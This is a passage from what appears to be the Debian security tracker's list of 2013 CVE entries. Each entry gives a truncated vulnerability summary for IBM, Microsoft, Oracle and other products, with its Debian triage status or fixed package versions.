NOT-FOR-US: IBM InfoSphere CVE-2013-4057 (Cross-site request forgery (CSRF) vulnerability in the XML Pack in IBM ...) NOT-FOR-US: IBM InfoSphere CVE-2013-4056 (Cross-site request forgery (CSRF) vulnerability in the Data Quality Co ...) NOT-FOR-US: IBM CVE-2013-4055 (Cross-site scripting (XSS) vulnerability in webadmin.nsf in Domino Web ...) NOT-FOR-US: IBM Domino CVE-2013-4054 (Directory traversal vulnerability in WMQ Telemetry in IBM WebSphere MQ ...) NOT-FOR-US: WebSphere CVE-2013-4053 (The WS-Security implementation in IBM WebSphere Application Server (WA ...) NOT-FOR-US: WebSphere CVE-2013-4052 (Cross-site scripting (XSS) vulnerability in the UDDI Administrative co ...) NOT-FOR-US: WebSphere CVE-2013-4051 (Cross-site scripting (XSS) vulnerability in webadmin.nsf in Domino Web ...) NOT-FOR-US: IBM Domino CVE-2013-4050 (Cross-site request forgery (CSRF) vulnerability in webadmin.nsf in Dom ...) NOT-FOR-US: IBM Domino CVE-2013-4049 (Unrestricted file upload vulnerability in IBM SPSS Analytical Decision ...) NOT-FOR-US: IBM SPSS CVE-2013-4048 (Cross-site scripting (XSS) vulnerability in IBM SPSS Analytical Decisi ...) NOT-FOR-US: IBM SPSS CVE-2013-4047 (Cross-site scripting (XSS) vulnerability in IBM SPSS Analytical Decisi ...) NOT-FOR-US: IBM SPSS CVE-2013-4046 (Open redirect vulnerability in IBM SPSS Collaboration and Deployment S ...) NOT-FOR-US: IBM SPSS Collaboration and Deployment Services CVE-2013-4045 (Cross-site scripting (XSS) vulnerability in the Portal application in ...) NOT-FOR-US: IBM SPSS Collaboration and Deployment Services CVE-2013-4044 (IBM SPSS Collaboration and Deployment Services 4.2.1 before 4.2.1.3 IF ...) NOT-FOR-US: IBM SPSS Collaboration and Deployment Services CVE-2013-4043 (The server in IBM SPSS Collaboration and Deployment Services 4.x befor ...) NOT-FOR-US: IBM SPSS Collaboration and Deployment Services CVE-2013-4042 (Unspecified vulnerability in IBM SPSS Collaboration and Deployment Ser ...) NOT-FOR-US: IBM SPSS Collaboration and Deployment Services CVE-2013-4041 (Unspecified vulnerability in IBM Java SDK 5.0.0 before SR16 FP4, 7.0.0 ...) NOT-FOR-US: IBM JDK CVE-2013-4040 (IBM Tivoli Application Dependency Discovery Manager (TADDM) 7.1.2.x be ...) NOT-FOR-US: IBM Tivoli Application Dependency Discovery Manager CVE-2013-4039 (IBM WebSphere Extended Deployment Compute Grid 8.0 before 8.0.0.3 allo ...) NOT-FOR-US: IBM WebSphere CVE-2013-4038 (The Intelligent Platform Management Interface (IPMI) implementation in ...) NOT-FOR-US: IBM BladeCenter CVE-2013-4037 (The RAKP protocol support in the Intelligent Platform Management Inter ...) NOT-FOR-US: IBM BladeCenter CVE-2013-4036 (Cross-site scripting (XSS) vulnerability in IBM InfoSphere Master Data ...) NOT-FOR-US: IBM CVE-2013-4035 (IBM Sterling Connect:Direct for OpenVMS 3.4.00, 3.4.01, 3.5.00, 3.6.0, ...) NOT-FOR-US: IBM Sterling CVE-2013-4034 (IBM Cognos Business Intelligence 8.4.1 before IF3, 10.1.0 before IF4, ...) NOT-FOR-US: IBM CVE-2013-4033 (IBM DB2 and DB2 Connect 9.7 through FP8, 9.8 through FP5, 10.1 through ...) NOT-FOR-US: IBM DB2 CVE-2013-4032 (The Fast Communications Manager (FCM) in IBM DB2 Enterprise Server Edi ...) NOT-FOR-US: IBM CVE-2013-4031 (The Intelligent Platform Management Interface (IPMI) implementation in ...) NOT-FOR-US: IBM BladeCenter CVE-2013-4030 (Integrated Management Module (IMM) 2 1.00 through 2.00 on IBM System X ...) NOT-FOR-US: IBM System X and Flex System CVE-2013-4029 RESERVED CVE-2013-4028 RESERVED CVE-2013-4027 (IBM Maximo Asset Management 6.2 through 6.2.8, 7.1 through 7.1.1.12, a ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2013-4026 RESERVED CVE-2013-4025 (IBM Data Studio Web Console 3.x before 3.2, Optim Performance Manager ...) NOT-FOR-US: IBM CVE-2013-4024 (IBM Data Studio Web Console 3.x before 3.2, Optim Performance Manager ...) NOT-FOR-US: IBM CVE-2013-4023 RESERVED CVE-2013-4022 (IBM Data Studio Web Console 3.x before 3.2, Optim Performance Manager ...) NOT-FOR-US: IBM CVE-2013-4021 (IBM Maximo Asset Management 6.2 through 6.2.8, 7.1 before 7.1.1.12, an ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2013-4020 (IBM Maximo Asset Management 6.2 through 6.2.8, 7.1 through 7.1.1.12, a ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2013-4019 (Cross-site scripting (XSS) vulnerability in IBM Maximo Asset Managemen ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2013-4018 (IBM Maximo Asset Management 6.2 through 6.2.8, 7.1 before 7.1.1.12, an ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2013-4017 (SQL injection vulnerability in IBM Maximo Asset Management 7.1 before ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2013-4016 (SQL injection vulnerability in IBM Maximo Asset Management 7.x before ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2013-4015 (Microsoft Internet Explorer 6 through 10 allows local users to bypass ...) NOT-FOR-US: MS IE CVE-2013-4014 (Cross-site scripting (XSS) vulnerability in IBM Maximo Asset Managemen ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2013-4013 (IBM Maximo Asset Management 6.2 through 6.2.8, 7.1 through 7.1.1.12, a ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2013-4012 (IBM WebSphere Portal 8.0.0.x before 8.0.0.1 CF09, when Content Templat ...) NOT-FOR-US: IBM WebSphere Portal CVE-2013-4011 (Multiple unspecified vulnerabilities in the InfiniBand subsystem in IB ...) NOT-FOR-US: IBM AIX CVE-2013-4010 RESERVED CVE-2013-4009 RESERVED CVE-2013-4008 RESERVED CVE-2013-4007 (Cross-site scripting (XSS) vulnerability in adv_sw.php in the Advanced ...) NOT-FOR-US: IBM CVE-2013-4006 (IBM WebSphere Application Server (WAS) Liberty Profile 8.5 before 8.5. ...) NOT-FOR-US: IBM CVE-2013-4005 (Cross-site scripting (XSS) vulnerability in the Administrative console ...) NOT-FOR-US: IBM WebSphere CVE-2013-4004 (Cross-site scripting (XSS) vulnerability in the Administrative console ...) NOT-FOR-US: IBM WebSphere CVE-2013-4003 (Multiple cross-site scripting (XSS) vulnerabilities in IBM TRIRIGA App ...) NOT-FOR-US: IBM TRIRIGA CVE-2013-4002 (XMLscanner.java in Apache Xerces2 Java Parser before 2.12.0, as used i ...) - openjdk-6 6b27-1.12.7-1 - openjdk-7 7u45-2.4.3-1 CVE-2013-4001 (Session fixation vulnerability in IBM Cognos Command Center before 10. ...) NOT-FOR-US: IBM Cognos Command Center CVE-2013-4000 (Multiple cross-site request forgery (CSRF) vulnerabilities in IBM Cogn ...) NOT-FOR-US: IBM Cognos Command Center CVE-2013-3999 (Cross-site scripting (XSS) vulnerability in IBM Social Media Analytics ...) NOT-FOR-US: IBM Social Media Analytics CVE-2013-3998 (CRLF injection vulnerability in the Web Application Enterprise Console ...) NOT-FOR-US: IBM InfoSphere CVE-2013-3997 (Open redirect vulnerability in the Web Application Enterprise Console ...) NOT-FOR-US: IBM InfoSphere CVE-2013-3996 (IBM InfoSphere BigInsights 1.1 through 2.1 does not properly handle FR ...) NOT-FOR-US: IBM CVE-2013-3995 (Cross-site scripting (XSS) vulnerability in IBM InfoSphere BigInsights ...) NOT-FOR-US: IBM CVE-2013-3994 RESERVED CVE-2013-3993 (IBM InfoSphere BigInsights before 2.1.0.3 allows remote authenticated ...) NOT-FOR-US: IBM InfoSphere BigInsights CVE-2013-3992 (Cross-site request forgery (CSRF) vulnerability in IBM InfoSphere BigI ...) NOT-FOR-US: IBM CVE-2013-3991 RESERVED CVE-2013-3990 (Cross-site scripting (XSS) vulnerability in the MIME e-mail functional ...) NOT-FOR-US: IBM CVE-2013-3989 (IBM Security AppScan Enterprise 8.x before 8.8 sends a cleartext AppSc ...) NOT-FOR-US: IBM Security AppScan Enterprise CVE-2013-3988 (The Meeting Server in IBM Sametime 8.5.2 through 8.5.2.1 and 9.x throu ...) NOT-FOR-US: IBM Sametime CVE-2013-3987 RESERVED CVE-2013-3986 (IBM Lotus Sametime 8.5.2 and 8.5.2.1 allows remote attackers to cause ...) NOT-FOR-US: IBM CVE-2013-3985 (The Enterprise Meeting Server in IBM Lotus Sametime 8.5.2 and 8.5.2.1 ...) NOT-FOR-US: IBM CVE-2013-3984 (The Meeting Server in IBM Sametime 8.x through 8.5.2.1 and 9.x through ...) NOT-FOR-US: IBM Sametime CVE-2013-3983 (The Meeting Server in IBM Sametime 8.5.2 through 8.5.2.1 and 9.x throu ...) NOT-FOR-US: IBM Sametime CVE-2013-3982 (The Meeting Server in IBM Sametime 8.x through 8.5.2.1 and 9.x through ...) NOT-FOR-US: IBM Sametime CVE-2013-3981 (The Meeting Server in IBM Sametime 8.x through 8.5.2.1 and 9.x through ...) NOT-FOR-US: IBM Sametime CVE-2013-3980 (The Meeting Server in IBM Sametime 8.x through 8.5.2.1 and 9.x through ...) NOT-FOR-US: IBM Sametime CVE-2013-3979 (Multiple cross-site scripting (XSS) vulnerabilities in the help pages ...) NOT-FOR-US: IBM Cognos Command Center CVE-2013-3978 (The Meeting Server in IBM Sametime 8.5.2 through 8.5.2.1 and 9.x throu ...) NOT-FOR-US: IBM Sametime CVE-2013-3977 (The Meeting Server in IBM Sametime 8.x through 8.5.2.1 and 9.x through ...) NOT-FOR-US: IBM Sametime CVE-2013-3976 (The (1) Data Protection for Exchange component 6.1 before 6.1.3.4 and ...) NOT-FOR-US: IBM Tivoli CVE-2013-3975 (Unspecified vulnerability in the Meeting Server in IBM Sametime 8.x th ...) NOT-FOR-US: IBM Sametime CVE-2013-3974 RESERVED CVE-2013-3973 (SQL injection vulnerability in IBM Maximo Asset Management 7.1 before ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2013-3972 (IBM Maximo Asset Management 7.1 before 7.1.1.12 and 7.5 before 7.5.0.5 ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2013-3971 (IBM Maximo Asset Management 7.1 through 7.1.1.12 and 7.5 before 7.5.0. ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2013-3970 (Juniper Junos Pulse Secure Access Service (aka SSL VPN) with IVE OS 7. ...) NOT-FOR-US: Juniper Junos Pulse Secure Access Service CVE-2013-3969 (The find prototype in scripting/engine_v8.h in MongoDB 2.4.0 through 2 ...) - mongodb 1:2.4.5-1 (bug #715007; bug #717173) [squeeze] - mongodb (Only affects 2.4.x) [wheezy] - mongodb (Only affects 2.4.x) NOTE: http://www.mongodb.org/about/alerts/ SERVER-9878 CVE-2013-3968 RESERVED CVE-2013-3967 RESERVED CVE-2013-3966 RESERVED CVE-2013-3965 RESERVED CVE-2013-3964 (Cross-site scripting (XSS) vulnerability in Samsung SHR-5162, SHR-5082 ...) NOT-FOR-US: Samsung CVE-2013-3963 (Cross-site request forgery (CSRF) vulnerability in goform/usermanage i ...) NOT-FOR-US: Grandstream CVE-2013-3962 (Cross-site scripting (XSS) vulnerability in Grandstream GXV3501, GXV35 ...) NOT-FOR-US: Grandstream CVE-2013-3961 (SQL injection vulnerability in edit_event.php in Simple PHP Agenda bef ...) NOT-FOR-US: Simple PHP Agenda CVE-2013-3960 (Easytime Studio Easy File Manager 1.1 has a HTTP request security bypa ...) NOT-FOR-US: Easytime Studio Easy File Manager CVE-2013-3959 (The Web Navigator in Siemens WinCC before 7.2 Update 1, as used in SIM ...) NOT-FOR-US: Siemens WinCC CVE-2013-3958 (The login implementation in the Web Navigator in Siemens WinCC before ...) NOT-FOR-US: Siemens WinCC CVE-2013-3957 (SQL injection vulnerability in the login screen in the Web Navigator i ...) NOT-FOR-US: Siemens WinCC CVE-2013-3956 (The NICM.SYS kernel driver 3.1.11.0 in Novell Client 4.91 SP5 on Windo ...) NOT-FOR-US: Novell Client on Windows CVE-2013-3955 (The get_xattrinfo function in the XNU kernel in Apple iOS 5.x and 6.x ...) NOT-FOR-US: Apple iOS CVE-2013-3954 (The posix_spawn system call in the XNU kernel in Apple Mac OS X 10.8.x ...) NOT-FOR-US: Apple Mac OS X CVE-2013-3953 (The mach_port_space_info function in osfmk/ipc/mach_debug.c in the XNU ...) NOT-FOR-US: Apple Mac OS X CVE-2013-3952 (The fill_pipeinfo function in bsd/kern/sys_pipe.c in the XNU kernel in ...) NOT-FOR-US: Apple Mac OS X CVE-2013-3951 (sys/openbsd/stack_protector.c in libc in Apple iOS 6.1.3 and Mac OS X ...) NOT-FOR-US: Apple iOS CVE-2013-3950 (Stack-based buffer overflow in the openSharedCacheFile function in dyl ...) NOT-FOR-US: Apple iOS CVE-2013-3949 (The posix_spawn system call in the XNU kernel in Apple Mac OS X 10.8.x ...) NOT-FOR-US: Apple Mac OS X CVE-2013-3948 (Apple iOS 6.1.3 does not follow redirects during determination of the ...) NOT-FOR-US: Apple iOS CVE-2013-3947 (Buffer overflow in MedCoreD.sys in AhnLab V3 Internet Security 8.0.7.5 ...) NOT-FOR-US: AhnLab V3 Internet Security CVE-2013-3946 (Heap-based buffer overflow in the MrSID plugin (MrSID.dll) before 4.37 ...) NOT-FOR-US: MrSID plugin (MrSID.dll) for IrfanView CVE-2013-3945 (The MrSID plugin (MrSID.dll) before 4.37 for IrfanView allows remote a ...) NOT-FOR-US: MrSID plugin (MrSID.dll) for IrfanView CVE-2013-3944 (Stack-based buffer overflow in the MrSID plugin (MrSID.dll) before 4.3 ...) NOT-FOR-US: MrSID plugin (MrSID.dll) for IrfanView CVE-2013-3943 (Cross-site scripting (XSS) vulnerability in DotNetNuke (DNN) before 6. ...) NOT-FOR-US: DotNetNukeDot CVE-2013-3942 (Potplayer prior to 1.5.39659: DLL Loading Arbitrary Code Execution Vul ...) NOT-FOR-US: Potplayer CVE-2013-3941 (Xjp2.dll in XnView before 2.13 allows remote attackers to execute arbi ...) NOT-FOR-US: XnView CVE-2013-3940 (Integer overflow in the Graphics Device Interface (GDI) in Microsoft W ...) NOT-FOR-US: Microsoft CVE-2013-3939 (xnview.exe in XnView before 2.13 does not properly handle RLE strip le ...) NOT-FOR-US: XnView CVE-2013-3938 (Integer overflow in xnview.exe in XnView 2.13 allows remote attackers ...) NOT-FOR-US: XnView CVE-2013-3937 (Heap-based buffer overflow in xnview.exe in XnView before 2.13 allows ...) NOT-FOR-US: XnView CVE-2013-3936 (Multiple cross-site scripting (XSS) vulnerabilities in Opsview before ...) NOT-FOR-US: Opsview CVE-2013-3935 (Cross-site request forgery (CSRF) vulnerability in Opsview before 4.4. ...) NOT-FOR-US: Opsview CVE-2013-3934 (Stack-based buffer overflow in Kingsoft Writer 2012 8.1.0.3030, as use ...) NOT-FOR-US: Kingsoft Office 2013 CVE-2013-3933 (Cross-site scripting (XSS) vulnerability in the JoomShopping (com_joom ...) NOT-FOR-US: Joomla component com_joomshopping CVE-2013-3932 (SQL injection vulnerability in the Jomres (com_jomres) component befor ...) NOT-FOR-US: Jomres (com_jomres) component for Joomla! CVE-2013-3931 (Cross-site scripting (XSS) vulnerability in the Jomres (com_jomres) co ...) NOT-FOR-US: Jomres (com_jomres) component for Joomla! CVE-2013-3930 (Stack-based buffer overflow in Core FTP before 2.2 build 1785 allows r ...) NOT-FOR-US: Core FTP (client) CVE-2013-3929 (Cross-site scripting (XSS) vulnerability in admin/editevent.php in CMS ...) NOT-FOR-US: CMS Made Simple CVE-2013-3928 (Stack-based buffer overflow in the ReadFile function in flt_BMP.dll in ...) NOT-FOR-US: Chasys Draw IES CVE-2013-3927 (Unspecified vulnerability in the client library in Siemens COMOS 9.2 b ...) NOT-FOR-US: Siemens COMOS CVE-2013-3926 (** DISPUTED ** Atlassian Crowd 2.6.3 allows remote attackers to execut ...) NOT-FOR-US: Atlassian Crowd CVE-2013-3925 (Atlassian Crowd 2.5.x before 2.5.4, 2.6.x before 2.6.3, 2.3.8, and 2.4 ...) NOT-FOR-US: Atlassian Crowd CVE-2013-3924 RESERVED CVE-2013-3923 (Directory traversal vulnerability in SavySoda WiFi HD Free before 7.0 ...) NOT-FOR-US: SavySoda WiFi HD Free CVE-2013-3922 (Directory traversal vulnerability in Gummy Bear Studios FTP Drive + HT ...) NOT-FOR-US: Gummy Bear Studios FTP Drive + HTTP Server CVE-2013-3921 (Directory traversal vulnerability in Easytime Studio Easy File Manager ...) NOT-FOR-US: Easytime Studio Easy File Manager CVE-2013-3920 (Cross-site scripting (XSS) vulnerability in Jahia xCM before 6.6.2 all ...) NOT-FOR-US: Jahia xCM CVE-2013-3918 (The InformationCardSigninHelper Class ActiveX control in icardie.dll i ...) NOT-FOR-US: Microsoft CVE-2013-3917 (Microsoft Internet Explorer 6 through 11 allows remote attackers to ex ...) NOT-FOR-US: Microsoft CVE-2013-3916 (Microsoft Internet Explorer 8 through 11 allows remote attackers to ex ...) NOT-FOR-US: Microsoft CVE-2013-3915 (Microsoft Internet Explorer 6 through 11 allows remote attackers to ex ...) NOT-FOR-US: Microsoft CVE-2013-3914 (Microsoft Internet Explorer 9 through 11 allows remote attackers to ex ...) NOT-FOR-US: Microsoft CVE-2013-3913 REJECTED CVE-2013-3912 (Microsoft Internet Explorer 8 through 11 allows remote attackers to ex ...) NOT-FOR-US: Microsoft CVE-2013-3911 (Microsoft Internet Explorer 9 and 10 allows remote attackers to execut ...) NOT-FOR-US: Microsoft CVE-2013-3910 (Microsoft Internet Explorer 6 through 9 allows remote attackers to exe ...) NOT-FOR-US: Microsoft CVE-2013-3909 (Microsoft Internet Explorer 6 through 8 allows remote attackers to rea ...) NOT-FOR-US: Microsoft CVE-2013-3908 (Microsoft Internet Explorer 6 through 10 allows user-assisted remote a ...) NOT-FOR-US: Microsoft CVE-2013-3907 (portcls.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, ...) NOT-FOR-US: Microsoft Windows Vista CVE-2013-3906 (GDI+ in Microsoft Windows Vista SP2 and Server 2008 SP2; Office 2003 S ...) NOT-FOR-US: Microsoft CVE-2013-3905 (Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does n ...) NOT-FOR-US: Microsoft CVE-2013-3904 REJECTED CVE-2013-3903 (Array index error in win32k.sys in the kernel-mode drivers in Microsof ...) NOT-FOR-US: Microsoft Windows CVE-2013-3902 (Use-after-free vulnerability in win32k.sys in the kernel-mode drivers ...) NOT-FOR-US: Microsoft Windows CVE-2013-3901 REJECTED CVE-2013-3900 (The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windo ...) NOT-FOR-US: Microsoft Windows CVE-2013-3899 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...) NOT-FOR-US: Microsoft Windows CVE-2013-3898 (Microsoft Windows 8 and Windows Server 2012, when Hyper-V is used, doe ...) NOT-FOR-US: Microsoft CVE-2013-3897 (Use-after-free vulnerability in the CDisplayPointer class in mshtml.dl ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3896 (Microsoft Silverlight 5 before 5.1.20913.0 does not properly validate ...) NOT-FOR-US: Microsoft Silverlight CVE-2013-3895 (Microsoft SharePoint Server 2007 SP3 and 2010 SP1 and SP2 allows remot ...) NOT-FOR-US: Microsoft SharePoint Server CVE-2013-3894 (The kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows S ...) NOT-FOR-US: Microsoft Windows CVE-2013-3893 (Use-after-free vulnerability in the SetMouseCapture implementation in ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3892 (Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote ...) NOT-FOR-US: Microsoft Word CVE-2013-3891 (Microsoft Word 2003 SP3 allows remote attackers to execute arbitrary c ...) NOT-FOR-US: Microsoft Word CVE-2013-3890 (Microsoft Excel 2007 SP3, Excel Viewer, and Office Compatibility Pack ...) NOT-FOR-US: Microsoft CVE-2013-3889 (Microsoft Excel 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT; Office ...) NOT-FOR-US: Microsoft CVE-2013-3888 (dxgkrnl.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, ...) NOT-FOR-US: Microsoft Windows CVE-2013-3887 (The Ancillary Function Driver (AFD) in afd.sys in the kernel-mode driv ...) NOT-FOR-US: Microsoft CVE-2013-3886 (Microsoft Internet Explorer 9 and 10 allows remote attackers to execut ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3885 (Microsoft Internet Explorer 10 allows remote attackers to execute arbi ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3884 REJECTED CVE-2013-3883 REJECTED CVE-2013-3882 (Microsoft Internet Explorer 10 allows remote attackers to execute arbi ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3881 (win32k.sys in the kernel-mode drivers in Microsoft Windows 7 SP1 and W ...) NOT-FOR-US: Microsoft Windows CVE-2013-3880 (The App Container feature in the kernel-mode drivers in Microsoft Wind ...) NOT-FOR-US: Microsoft Windows CVE-2013-3879 (Use-after-free vulnerability in win32k.sys in the kernel-mode drivers ...) NOT-FOR-US: Microsoft Windows CVE-2013-3878 (Stack-based buffer overflow in the LRPC client in Microsoft Windows XP ...) NOT-FOR-US: Microsoft Windows CVE-2013-3877 REJECTED CVE-2013-3876 (DirectAccess in Microsoft Windows XP SP2 and SP3, Windows Server 2003 ...) NOT-FOR-US: Microsoft CVE-2013-3875 (Microsoft Internet Explorer 8 and 9 allows remote attackers to execute ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3874 (Microsoft Internet Explorer 9 allows remote attackers to execute arbit ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3873 (Microsoft Internet Explorer 10 allows remote attackers to execute arbi ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3872 (Microsoft Internet Explorer 10 allows remote attackers to execute arbi ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3871 (Microsoft Internet Explorer 6 through 10 allows remote attackers to ex ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3870 (Double free vulnerability in Microsoft Outlook 2007 SP3 and 2010 SP1 a ...) NOT-FOR-US: Microsoft Outlook CVE-2013-3869 (Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vis ...) NOT-FOR-US: Microsoft CVE-2013-3868 (Microsoft Active Directory Lightweight Directory Service (AD LDS) on W ...) NOT-FOR-US: Microsoft CVE-2013-3867 REJECTED CVE-2013-3866 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...) NOT-FOR-US: Microsoft Windows CVE-2013-3865 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...) NOT-FOR-US: Microsoft Windows CVE-2013-3864 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...) NOT-FOR-US: Microsoft Windows CVE-2013-3863 (Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allow remote atta ...) NOT-FOR-US: Microsoft CVE-2013-3862 (Double free vulnerability in Microsoft Windows 7 and Server 2008 R2 SP ...) NOT-FOR-US: Microsoft CVE-2013-3861 (Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 allo ...) NOT-FOR-US: Microsoft .NET Framework CVE-2013-3860 (Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does ...) NOT-FOR-US: Microsoft .NET Framework CVE-2013-3859 (Microsoft Pinyin IME 2010, when used in conjunction with Microsoft Off ...) NOT-FOR-US: Microsoft Pinyin IME CVE-2013-3858 (Microsoft Word Automation Services in SharePoint Server 2010 SP1, Word ...) NOT-FOR-US: Microsoft CVE-2013-3857 (Microsoft Word Automation Services in SharePoint Server 2010 SP1 and S ...) NOT-FOR-US: Microsoft CVE-2013-3856 (Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to exec ...) NOT-FOR-US: Microsoft CVE-2013-3855 (Microsoft Word 2003 SP3 and 2007 SP3, Office Compatibility Pack SP3, a ...) NOT-FOR-US: Microsoft CVE-2013-3854 (Microsoft Office 2007 SP3 and Word 2007 SP3 allow remote attackers to ...) NOT-FOR-US: Microsoft CVE-2013-3853 (Microsoft Office 2007 SP3 and Word 2007 SP3 allow remote attackers to ...) NOT-FOR-US: Microsoft CVE-2013-3852 (Microsoft Word 2003 SP3, 2007 SP3, and 2010 SP1; Office Compatibility ...) NOT-FOR-US: Microsoft CVE-2013-3851 (Microsoft Office 2003 SP3 and 2007 SP3, Word 2003 SP3 and 2007 SP3, Of ...) NOT-FOR-US: Microsoft CVE-2013-3850 (Microsoft Word 2003 SP3, 2007 SP3, and 2010 SP1 and SP2; Office Compat ...) NOT-FOR-US: Microsoft Word CVE-2013-3849 (Microsoft Word Automation Services in SharePoint Server 2010 SP1, Word ...) NOT-FOR-US: Microsoft CVE-2013-3848 (Microsoft Word Automation Services in SharePoint Server 2010 SP1, Word ...) NOT-FOR-US: Microsoft CVE-2013-3847 (Microsoft Word Automation Services in SharePoint Server 2010 SP1, Word ...) NOT-FOR-US: Microsoft CVE-2013-3846 (Use-after-free vulnerability in Microsoft Internet Explorer 9 and 10 a ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3845 (Microsoft Internet Explorer 8 and 9 allows remote attackers to execute ...) NOT-FOR-US: Microsoft CVE-2013-3844 REJECTED CVE-2013-3842 (Unspecified vulnerability Oracle Solaris 10 allows local users to affe ...) NOT-FOR-US: Solaris CVE-2013-3841 (Unspecified vulnerability in the Siebel Core - EAI component in Oracle ...) NOT-FOR-US: Oracle Siebel CRM CVE-2013-3840 (Unspecified vulnerability in the Siebel Core - EAI component in Oracle ...) NOT-FOR-US: Oracle Siebel CRM CVE-2013-3839 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) {DSA-2818-1 DSA-2780-1} - mysql-5.5 5.5.33 - mysql-5.1 - mariadb-5.5 5.5.35-1 - mariadb-10.0 (Fixed before initial upload) NOTE: http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html CVE-2013-3838 (Unspecified vulnerability in Oracle SPARC Enterprise T & M Series ...) NOT-FOR-US: Oracle SPARC Enterprise CVE-2013-3837 (Unspecified vulnerability in Oracle Solaris 10 and 11.1 allows remote ...) NOT-FOR-US: Oracle Solaris CVE-2013-3836 (Unspecified vulnerability in the Oracle Web Cache component in Oracle ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-3835 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-3834 (Unspecified vulnerability in the Oracle Secure Global Desktop componen ...) NOT-FOR-US: Oracle Secure Global Desktop CVE-2013-3833 (Unspecified vulnerability in the Oracle Access Manager component in Or ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-3832 (Unspecified vulnerability in the Siebel Server Remote component in Ora ...) NOT-FOR-US: Oracle Siebel CRM CVE-2013-3831 (Unspecified vulnerability in the Oracle Portal component in Oracle Fus ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-3830 (Unspecified vulnerability in the Hyperion Strategic Finance component ...) NOT-FOR-US: Oracle Hyperion CVE-2013-3829 (Unspecified vulnerability in the Java SE, Java SE Embedded component i ...) - openjdk-6 6b27-1.12.7-1 - openjdk-7 7u45-2.4.3-1 CVE-2013-3828 (Unspecified vulnerability in the Oracle Web Services component in Orac ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-3827 (Unspecified vulnerability in the Oracle GlassFish Server component in ...) - glassfish (Full application server not packaged) CVE-2013-3826 (Unspecified vulnerability in the Core RDBMS component in Oracle Databa ...) NOT-FOR-US: Oracle Database Server CVE-2013-3825 (Unspecified vulnerability in the Oracle Agile Product Collaboration co ...) NOT-FOR-US: Oracle Supply Chain Products Suite CVE-2013-3824 (Unspecified vulnerability in the Oracle Agile Collaboration Framework ...) NOT-FOR-US: Oracle Supply Chain Products Suite CVE-2013-3823 (Unspecified vulnerability in the Oracle Agile PLM Framework component ...) NOT-FOR-US: Oracle Supply Chain Products Suite CVE-2013-3822 (Unspecified vulnerability in the Oracle Agile PLM Framework component ...) NOT-FOR-US: Oracle Supply Chain Products Suite CVE-2013-3821 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-3820 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-3819 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-3818 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-3817 REJECTED CVE-2013-3816 (Unspecified vulnerability in the Oracle Policy Automation component in ...) NOT-FOR-US: Oracle Industry Applications CVE-2013-3815 REJECTED CVE-2013-3814 (Unspecified vulnerability in the Oracle Retail Invoice Matching compon ...) NOT-FOR-US: Oracle Industry Applications CVE-2013-3813 (Unspecified vulnerability in Oracle Solaris 10 allows remote attackers ...) NOT-FOR-US: Oracle Solaris CVE-2013-3812 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) {DSA-2818-1} - mysql-5.5 5.5.33+dfsg-1 - mysql-5.1 (Only affects 5.5 and 5.6) - mariadb-5.5 (Fixed before initial upload) - mariadb-10.0 (Fixed before initial upload) NOTE: http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html CVE-2013-3811 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) - mysql-5.5 (Only affects Mysql 5.6) - mysql-5.1 (Only affects Mysql 5.6) NOTE: 